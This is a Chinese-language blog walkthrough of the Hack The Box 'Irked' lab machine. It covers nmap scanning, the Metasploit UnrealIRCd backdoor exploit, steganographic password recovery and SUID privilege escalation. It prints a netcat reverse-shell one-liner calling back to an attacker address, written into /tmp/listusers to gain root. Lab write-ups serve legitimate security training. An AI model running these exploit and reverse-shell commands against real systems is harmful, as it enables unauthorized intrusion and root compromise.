Irked

Posted by on 2020年2月24日


Irked

nmap扫描端口

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.117 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.10.10.117

file

从80入手,80显示 IRC正在运行

file

根据之前的nmap结果,搜索Unrealircd exploit

searchsploit Unrealircd

file

使用msf get ircd shell

use exploit/unix/irc/unreal_ircd_3281_backdoor
set rhosts 10.10.10.117
set rport 6697
run

file

get tty shell

python -c 'import pty;pty.spawn("/bin/bash")'

file

翻找了ircd和djmardov目录
.ssh无权进入
.backup获取一段密文
user.txt无权查看

file

那么我们怎么获取djmardov的用户身份呢?
这时想到了之前80端口的图片

wget http://10.10.10.117/irked.jpg
apt-get install steghide
steghide info irked.jpg
UPupDOWNdownLRlrBAbaSSss
steghide extract -sf irked.jpg
UPupDOWNdownLRlrBAbaSSss
cat pass.txt

file

用户名:djmardov
密码:Kab6h+m+bbp2J:HG
get user.txt

file

在列出suid文件时,会注意到/usr/bin/viewuser文件在Debian中默认不存在

find / -type f -perm -4000 2>/dev/null

file

执行/usr/bin/viewuser报错

file

拷贝到kali机

scp djmardov@10.10.10.117:/usr/bin/viewuser viewuser

file

使用ltrace运行viewuser,发现它可以执行/tmp/listusers,而且setuid(0),是使用root权限执行

apt-get install ltrace
ltrace ./viewuser

file

kali执行:

nc -vlp 4444

靶机执行:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.45 4444 >/tmp/f" > /tmp/listusers
chmod 777 /tmp/listusers
/usr/bin/viewuser

file

get root.txt

file




发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据